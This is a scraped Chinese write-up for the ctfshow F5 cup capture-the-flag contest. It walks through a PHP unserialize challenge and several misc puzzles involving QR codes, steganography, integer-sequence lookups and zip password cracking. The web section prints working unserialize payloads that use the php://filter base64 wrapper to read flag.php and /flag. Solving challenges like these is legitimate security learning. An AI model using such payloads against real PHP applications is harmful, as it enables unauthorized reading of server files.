ctfshow F5杯 部分WP(writeup) 超详细 |
您所在的位置:网站首页 › 黑呀呀的呀怎么写 › ctfshow F5杯 部分WP(writeup) 超详细 |
本文共4370字,147段落,全文看完预计用时10分钟 这次F5杯的misc难度感觉比大吉杯难了许多,出题人的脑洞太大了 在这里感谢各位大师傅群里的随缘hint(水群大胜利) 写的非常详细,可以跟着实际操作,所以最后不会贴上静态flag web eazy-unserialize &eazy-unserialize-revenge misc 大小二维码 填字游戏 牛年大吉3.0 两行代码一纸情书 F5也会LSB F5还会学中文 GoodNight WEB: eazy-unserialize &eazy-unserialize-revenge 一个payload打通两道,所以就放在一起前半部分估计是某个登录页面的执行代码,为干扰项,重点在后半部分
payload:?w_a_n=O:5:“Happy”:1:{s:4:“file”;s:57:“php://filter/read=convert.base64-encode/resource=flag.php”;} 读取到PD9waHANCiFkZWZpbmVkKCdIYXBweScpICYmIGV4aXQoJ0FjY2VzcyBEZW5pZWQnKTsNCmVjaG8gZmlsZV9nZXRfY29udGVudHMoIi9mbGFnIik7DQoNCj8+ 进行base64 ?w_a_n=O:5:“Happy”:1:{s:4:“file”;s:5:"/flag";} 好像这个payload被修了,那就和之前读flag.php一样用php协议读取 payload:?w_a_n=O:5:“Happy”:1:{s:4:“file”;s:54:“php://filter/read=convert.base64-encode/resource=/flag”;} 得到flag 八神师傅的创意题,脑洞也还是大 首先得到一张超大的二维码,用手机QQ扫码只能显示部分,但是开头是7z。猜测是将7z压缩包数据写进了二维码, 使用barcode扫码将十六进制数据复制下来 https://online-barcode-reader.inliteresearch.com/ 得到flag 1.a(n) = n*(n^2+1)/2 2.Number of balls in pyramid with base either aregular hexagon or a hexagon with alternate sides differing by 1 3.Initial members of prime sextuplets (p, p+4, p+6,p+10, p+12,p+16) 4.Primes p such that neither p-2 nor p+2 is prime 5.Smith (or joke) numbers 6.the number of distinct reduced words of length n in the Coxeter group of “Apollonian reflections” in three dimensions 7.Hyperfactorials 8.Number of factorization patterns of polynomials of degree n over integers 9.Initial members of prime triples(p,p+4,p+6) 这里随便拿两个来举例 首先拿第二个 因为是纯英文,就不用想百度了,直接上google。 在此平台继续搜,特别注意,第一个也要在这个平台搜,不要自己代值进去,因为代值进去应该都不会想到先代数字0…
是i_kei神的题,果然3.0难度倍增,套娃纯度也增加了 首先看hint hint1:有耳就行 hint2:有眼就行 下载附件得到一张ppt 能听到动听的《春节序曲》,结合有耳就行,应该需要提取下来 看完ppt,能够发现最后藏有信息,将字体颜色改为红色 下载dll附件,使用notepad++打开,直接搜ctf,发现一长串类似编码,复制下来进行base64解码,发现无乱码,一直向下解,得到flag 压缩包显示6long,爆破得到密码114514(恶臭),解压得到 504B03041400010000007C4C4D524A0409E41D0000001100000008000000666C61672E747874268FDB736D3D74D7654C946555EF139A56337B2E90EE9D79DE3A0632B2504B01023F001400010000007C4C4D524A0409E41D00000011000000080024000000000000002000000000000000666C61672E7478740A0020000000000001001800CBE6AA92A801D701F7A65B93A801D701A0FCEAE4A501D701504B050600000000010001005A000000430000000000 得到zip包,发现有密码,再进行爆破,密码为7775,解压打开txt 下载附件解压,得到 F5.jpg 和 flag.zip,flag.zip 需要密码,将 F5.jpg 放入 010 查看JPG结束后的"文件头"和文件尾 Hint1:题目的附件名字很重要 Hint2:flag的内容要转为md5 又是套娃呜呜呜难死了 首先GoodNight很重要,估计是某种加密的密码,最后发现还是OurSecret 然后进行base转码,只可能是base64以上的,最后发现base91成功转码 https://ctf.bugku.com/tool/base91
本文完 |
CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3 |